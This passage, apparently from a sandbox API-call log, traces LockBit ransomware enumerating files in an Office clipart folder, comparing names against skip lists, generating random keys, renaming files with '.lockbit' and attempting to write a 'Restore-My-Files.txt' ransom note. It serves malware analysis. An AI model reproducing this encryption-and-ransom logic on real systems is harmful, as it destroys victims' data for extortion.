ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51e3fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1815, dwReserved0=0x0, dwReserved1=0x0, cFileName="EAST_01.MID", cAlternateFileName="")) returned 1 [0113.428] lstrcmpiW (lpString1=".", lpString2="EAST_01.MID") returned -1 [0113.428] lstrcmpiW (lpString1="..", lpString2="EAST_01.MID") returned -1 [0113.428] PathFindExtensionW (pszPath="EAST_01.MID") returned=".MID" [0113.428] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0113.428] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0113.428] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0113.428] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0113.428] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0113.428] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0113.429] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0113.429] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0113.430] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0113.430] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="EAST_01.MID") returned 1 [0113.430] lstrcmpiW (lpString1="ntldr", lpString2="EAST_01.MID") returned 1 [0113.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="EAST_01.MID") returned 1 [0113.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="EAST_01.MID") returned -1 [0113.430] lstrcmpiW (lpString1="autorun.inf", lpString2="EAST_01.MID") returned -1 [0113.431] lstrcmpiW (lpString1="thumbs.db", lpString2="EAST_01.MID") returned 1 [0113.431] lstrcmpiW (lpString1="iconcache.db", lpString2="EAST_01.MID") returned 1 [0113.431] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.431] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned=".MID" [0113.431] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0113.431] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0113.431] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0113.432] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0113.432] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.lockbit") returned 71 [0113.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0113.439] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.439] malloc (_Size=0x40068) returned 0x3db04c0 [0113.439] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=6165) returned 1 [0113.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0113.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0113.440] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.445] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.445] malloc (_Size=0xa4) returned 0x77d7a8 [0113.445] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0113.446] free (_Block=0x77d7a8) [0113.446] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.446] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.446] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd787d00, ftCreationTime.dwHighDateTime=0x1bd4ae1, ftLastAccessTime.dwLowDateTime=0x51f4a830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd787d00, ftLastWriteTime.dwHighDateTime=0x1bd4ae1, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED00010_.WMF", cAlternateFileName="")) returned 1 [0113.446] lstrcmpiW (lpString1=".", lpString2="ED00010_.WMF") returned -1 [0113.446] lstrcmpiW (lpString1="..", lpString2="ED00010_.WMF") returned -1 [0113.446] PathFindExtensionW (pszPath="ED00010_.WMF") returned=".WMF" [0113.446] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.446] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.447] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.447] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ED00010_.WMF") returned 1 [0113.448] lstrcmpiW (lpString1="ntldr", lpString2="ED00010_.WMF") returned 1 [0113.448] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ED00010_.WMF") returned 1 [0113.448] lstrcmpiW (lpString1="bootsect.bak", lpString2="ED00010_.WMF") returned -1 [0113.448] lstrcmpiW (lpString1="autorun.inf", lpString2="ED00010_.WMF") returned -1 [0113.448] lstrcmpiW (lpString1="thumbs.db", lpString2="ED00010_.WMF") returned 1 [0113.448] lstrcmpiW (lpString1="iconcache.db", lpString2="ED00010_.WMF") returned 1 [0113.448] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.448] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned=".WMF" [0113.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.448] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.448] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.449] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.449] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.lockbit") returned 72 [0113.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.462] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.462] malloc (_Size=0x40068) returned 0x3d70450 [0113.462] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1382) returned 1 [0113.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.464] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.466] malloc (_Size=0xa6) returned 0x77d7a8 [0113.466] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.467] free (_Block=0x77d7a8) [0113.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.467] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.467] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.467] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a81c00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x51f4a830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb2a81c00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x32f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED00019_.WMF", cAlternateFileName="")) returned 1 [0113.467] lstrcmpiW (lpString1=".", lpString2="ED00019_.WMF") returned -1 [0113.467] lstrcmpiW (lpString1="..", lpString2="ED00019_.WMF") returned -1 [0113.467] PathFindExtensionW (pszPath="ED00019_.WMF") returned=".WMF" [0113.467] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.467] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.468] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.468] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ED00019_.WMF") returned 1 [0113.469] lstrcmpiW (lpString1="ntldr", lpString2="ED00019_.WMF") returned 1 [0113.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ED00019_.WMF") returned 1 [0113.469] lstrcmpiW (lpString1="bootsect.bak", lpString2="ED00019_.WMF") returned -1 [0113.469] lstrcmpiW (lpString1="autorun.inf", lpString2="ED00019_.WMF") returned -1 [0113.469] lstrcmpiW (lpString1="thumbs.db", lpString2="ED00019_.WMF") returned 1 [0113.469] lstrcmpiW (lpString1="iconcache.db", lpString2="ED00019_.WMF") returned 1 [0113.469] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned=".WMF" [0113.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.469] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.469] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.470] lstrcmpiW (lpString1=".sdf", 